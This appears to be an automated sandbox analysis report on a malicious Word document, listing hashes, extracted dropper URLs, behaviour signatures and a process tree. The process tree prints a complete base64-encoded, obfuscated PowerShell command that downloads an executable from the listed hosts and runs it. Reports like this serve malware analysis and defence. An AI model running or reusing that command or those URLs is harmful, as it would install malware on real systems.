Analysis

  • max time kernel
    105s
  • max time network
    49s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    21-05-2022 00:05

General

  • Target

    d1471ba011dbddb8345e6f8e2d2fadfd0bce5b7ddbff48ef2a343c5329aa63a3.doc

  • Size

    216KB

  • MD5

    60c75628f7aa95b2bd7178631241b149

  • SHA1

    14273be13011405c414f5c85cfa2473ac161019a

  • SHA256

    d1471ba011dbddb8345e6f8e2d2fadfd0bce5b7ddbff48ef2a343c5329aa63a3

  • SHA512

    a6b1a94e7d87ea9b93103ec0b208d2f4f9c5ffe8384323d426b58654b5f7abf078d5ef98e44a5c572d89eca050f9f856c72d9f9964e3df0792f9f38d46f8c989

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://zenithenergy.com/wp-admin/E/

exe.dropper

http://vietnamv1.com/wp-admin/W/

exe.dropper

https://tunicip.com/test035/1n/

exe.dropper

http://www.mjplantbased.com/cgi-bin/ht/

exe.dropper

http://tamymakeup.com/myclassapp/Rt/

exe.dropper

http://ucmasabacusnagpurandchattisgarh.com/App/JVO/

exe.dropper

https://gapuragamapersada.com/wp-admin/c/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d1471ba011dbddb8345e6f8e2d2fadfd0bce5b7ddbff48ef2a343c5329aa63a3.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1808
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1524
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABNAHcAZQBnAGgAdABoAD0AKAAnAEYAJwArACgAJwBjAGwAJwArACcAMAAnACkAKwAoACcAXwAnACsAJwBiAGoAJwApACkAOwAuACgAJwBuAGUAdwAtAGkAdABlACcAKwAnAG0AJwApACAAJABlAG4AdgA6AFQARQBtAHAAXABXAG8AcgBkAFwAMgAwADEAOQBcACAALQBpAHQAZQBtAHQAeQBwAGUAIABEAEkAUgBlAEMAVABvAHIAWQA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAGMAYABVAGAAUgBpAGAAVABgAHkAcABSAG8AVABPAEMATwBMACIAIAA9ACAAKAAnAHQAJwArACgAJwBsAHMAMQAnACsAJwAyACcAKQArACgAJwAsACAAdAAnACsAJwBsACcAKQArACcAcwAnACsAKAAnADEAMQAnACsAJwAsACAAJwArACcAdABsAHMAJwApACkAOwAkAEYAMgBtAHEAMAB2ADcAIAA9ACAAKAAnAEEAJwArACgAJwBhADkAJwArACcANAA5AHMAJwApACsAKAAnADcAJwArACcAZwBoACcAKQApADsAJABaAHAAMwBxADMAcgB6AD0AKAAoACcAQQAnACsAJwByAHoAJwApACsAKAAnAGkAJwArACcAZQBuAGgAJwApACkAOwAkAFgAbwA3ADUANgB3AGkAPQAkAGUAbgB2ADoAdABlAG0AcAArACgAKAAnAHsAJwArACcAMAAnACsAJwB9AHcAbwAnACsAJwByAGQAewAwAH0AMgAwADEAOQB7ACcAKwAnADAAJwArACcAfQAnACkAIAAtAEYAIABbAGMASABBAHIAXQA5ADIAKQArACQARgAyAG0AcQAwAHYANwArACgAKAAnAC4AJwArACcAZQB4ACcAKQArACcAZQAnACkAOwAkAFAAMwBsAGsAbABnAHMAPQAoACcASwAnACsAKAAnADAAeQBkAGIAYQAnACsAJwAyACcAKQApADsAJABQAHAAbQA1AGgANABsAD0ALgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBvAGIAagBlAGMAJwArACcAdAAnACkAIABuAEUAdAAuAFcARQBCAEMATABJAEUAbgB0ADsAJABVAHAAagBoAGYAZAA3AD0AKAAnAGgAdAAnACsAJwB0AHAAJwArACgAJwA6AC8AJwArACcALwAnACkAKwAoACcAegBlACcAKwAnAG4AaQB0ACcAKQArACcAaAAnACsAJwBlAG4AJwArACgAJwBlAHIAZwAnACsAJwB5AC4AJwApACsAKAAnAGMAbwAnACsAJwBtAC8AJwApACsAKAAnAHcAJwArACcAcAAtAGEAJwApACsAJwBkAG0AJwArACgAJwBpAG4ALwBFACcAKwAnAC8AJwArACcAKgBoACcAKQArACgAJwB0AHQAJwArACcAcAA6AC8ALwAnACsAJwB2AGkAZQB0ACcAKQArACcAbgAnACsAKAAnAGEAbQB2ADEALgBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAnACkAKwAoACcALQBhACcAKwAnAGQAbQAnACkAKwAoACcAaQBuAC8AJwArACcAVwAvACoAJwApACsAJwBoAHQAJwArACcAdAAnACsAKAAnAHAAcwAnACsAJwA6AC8ALwB0ACcAKQArACgAJwB1AG4AaQAnACsAJwBjAGkAcAAuACcAKQArACgAJwBjACcAKwAnAG8AbQAvAHQAJwArACcAZQAnACkAKwAoACcAcwB0ACcAKwAnADAAMwA1ACcAKQArACgAJwAvACcAKwAnADEAbgAvACoAJwApACsAJwBoACcAKwAnAHQAdAAnACsAKAAnAHAAOgAnACsAJwAvAC8AJwApACsAJwB3AHcAJwArACgAJwB3ACcAKwAnAC4AbQBqACcAKwAnAHAAbABhACcAKQArACcAbgB0ACcAKwAnAGIAJwArACgAJwBhAHMAJwArACcAZQBkAC4AYwAnACkAKwAnAG8AbQAnACsAJwAvAGMAJwArACgAJwBnACcAKwAnAGkALQAnACkAKwAoACcAYgBpAG4AJwArACcALwBoAHQAJwArACcALwAnACkAKwAoACcAKgBoACcAKwAnAHQAJwApACsAKAAnAHQAcAAnACsAJwA6ACcAKQArACcALwAnACsAKAAnAC8AdAAnACsAJwBhAG0AJwApACsAKAAnAHkAbQBhAGsAZQAnACsAJwB1AHAALgBjAG8AbQAnACsAJwAvACcAKQArACcAbQB5ACcAKwAoACcAYwAnACsAJwBsAGEAcwAnACkAKwAoACcAcwAnACsAJwBhAHAAcAAnACkAKwAoACcALwBSACcAKwAnAHQAJwApACsAJwAvACcAKwAnACoAaAAnACsAJwB0ACcAKwAoACcAdABwACcAKwAnADoALwAnACkAKwAoACcALwAnACsAJwB1AGMAbQAnACkAKwAoACcAYQBzACcAKwAnAGEAYgAnACkAKwAnAGEAJwArACgAJwBjACcAKwAnAHUAcwBuAGEAZwAnACsAJwBwACcAKQArACgAJwB1AHIAYQBuAGQAJwArACcAYwAnACsAJwBoACcAKQArACcAYQAnACsAKAAnAHQAdABpAHMAJwArACcAZwBhACcAKQArACgAJwByAGgAJwArACcALgBjACcAKQArACgAJwBvAG0ALwBBAHAAJwArACcAcAAvAEoAVgBPACcAKwAnAC8AJwArACcAKgBoAHQAdAAnACkAKwAoACcAcAAnACsAJwBzADoALwAnACkAKwAnAC8AJwArACgAJwBnAGEAcAB1ACcAKwAnAHIAYQAnACkAKwAoACcAZwBhAG0AJwArACcAYQAnACkAKwAoACcAcAAnACsAJwBlAHIAJwApACsAKAAnAHMAYQBkACcAKwAnAGEALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AdwAnACsAJwBwAC0AYQAnACkAKwAoACcAZABtACcAKwAnAGkAJwArACcAbgAvAGMALwAnACkAKQAuACIAUwBQAGAATABpAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABaAGkAdAA0AHEAMwBrAD0AKAAnAEgAJwArACgAJwBhAGEAJwArACcANABkADUANwAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEIAdgA5AHQAZAA0AG8AIABpAG4AIAAkAFUAcABqAGgAZgBkADcAKQB7AHQAcgB5AHsAJABQAHAAbQA1AGgANABsAC4AIgBkAGAAbwBXAE4AbABvAEEAYABEAGYASQBMAGUAIgAoACQAQgB2ADkAdABkADQAbwAsACAAJABYAG8ANwA1ADYAdwBpACkAOwAkAFAAawA3AGQANwA5AHkAPQAoACgAJwBYACcAKwAnAGoAYgAnACkAKwAoACcANQAnACsAJwA1AHcAOQAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACAAJABYAG8ANwA1ADYAdwBpACkALgAiAGwAYABlAG4AZwBUAEgAIgAgAC0AZwBlACAAMgAwADYANwAzACkAIAB7AC4AKAAnAEkAbgB2AG8AJwArACcAawBlACcAKwAnAC0ASQB0AGUAbQAnACkAKAAkAFgAbwA3ADUANgB3AGkAKQA7ACQAVABpADgANQBwAGgANQA9ACgAKAAnAE0AXwBsAGcAJwArACcAMQAnACkAKwAnAHAAJwArACcAdgAnACkAOwBiAHIAZQBhAGsAOwAkAEMAcgAzAGUAeABjAGIAPQAoACcAVAA2ACcAKwAoACcAaAAyACcAKwAnAHIAYQB5ACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABaAGMAbgB2ADAAMQBnAD0AKAAoACcAQgB3AG8AOQBtACcAKwAnAHcAJwApACsAJwBpACcAKQA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:820

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/820-81-0x000007FEFB671000-0x000007FEFB673000-memory.dmp
      Filesize

      8KB

    • memory/820-86-0x000000000298B000-0x00000000029AA000-memory.dmp
      Filesize

      124KB

    • memory/820-85-0x000000001B820000-0x000000001BB1F000-memory.dmp
      Filesize

      3.0MB

    • memory/820-83-0x000007FEF27B0000-0x000007FEF330D000-memory.dmp
      Filesize

      11.4MB

    • memory/820-84-0x0000000002984000-0x0000000002987000-memory.dmp
      Filesize

      12KB

    • memory/820-82-0x000007FEF3310000-0x000007FEF3D33000-memory.dmp
      Filesize

      10.1MB

    • memory/1524-87-0x0000000000000000-mapping.dmp
    • memory/1808-71-0x0000000000847000-0x000000000084A000-memory.dmp
      Filesize

      12KB

    • memory/1808-74-0x0000000000847000-0x000000000084A000-memory.dmp
      Filesize

      12KB

    • memory/1808-63-0x0000000000847000-0x000000000084A000-memory.dmp
      Filesize

      12KB

    • memory/1808-64-0x0000000000847000-0x000000000084A000-memory.dmp
      Filesize

      12KB

    • memory/1808-65-0x0000000000847000-0x000000000084A000-memory.dmp
      Filesize

      12KB

    • memory/1808-66-0x0000000000847000-0x000000000084A000-memory.dmp
      Filesize

      12KB

    • memory/1808-67-0x0000000000847000-0x000000000084A000-memory.dmp
      Filesize

      12KB

    • memory/1808-68-0x0000000000847000-0x000000000084A000-memory.dmp
      Filesize

      12KB

    • memory/1808-69-0x0000000000847000-0x000000000084A000-memory.dmp
      Filesize

      12KB

    • memory/1808-54-0x0000000072161000-0x0000000072164000-memory.dmp
      Filesize

      12KB

    • memory/1808-70-0x0000000000847000-0x000000000084A000-memory.dmp
      Filesize

      12KB

    • memory/1808-72-0x0000000000847000-0x000000000084A000-memory.dmp
      Filesize

      12KB

    • memory/1808-73-0x0000000000847000-0x000000000084A000-memory.dmp
      Filesize

      12KB

    • memory/1808-62-0x0000000000847000-0x000000000084A000-memory.dmp
      Filesize

      12KB

    • memory/1808-75-0x0000000000847000-0x000000000084A000-memory.dmp
      Filesize

      12KB

    • memory/1808-76-0x0000000000847000-0x000000000084A000-memory.dmp
      Filesize

      12KB

    • memory/1808-77-0x0000000000847000-0x000000000084A000-memory.dmp
      Filesize

      12KB

    • memory/1808-79-0x0000000000847000-0x000000000084A000-memory.dmp
      Filesize

      12KB

    • memory/1808-80-0x0000000000847000-0x000000000084A000-memory.dmp
      Filesize

      12KB

    • memory/1808-78-0x0000000000847000-0x000000000084A000-memory.dmp
      Filesize

      12KB

    • memory/1808-61-0x0000000000847000-0x000000000084A000-memory.dmp
      Filesize

      12KB

    • memory/1808-60-0x00000000007B3000-0x00000000007B7000-memory.dmp
      Filesize

      16KB

    • memory/1808-59-0x00000000007B3000-0x00000000007B7000-memory.dmp
      Filesize

      16KB

    • memory/1808-58-0x0000000070BCD000-0x0000000070BD8000-memory.dmp
      Filesize

      44KB

    • memory/1808-57-0x0000000075BD1000-0x0000000075BD3000-memory.dmp
      Filesize

      8KB

    • memory/1808-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1808-55-0x000000006FBE1000-0x000000006FBE3000-memory.dmp
      Filesize

      8KB

    • memory/1808-89-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB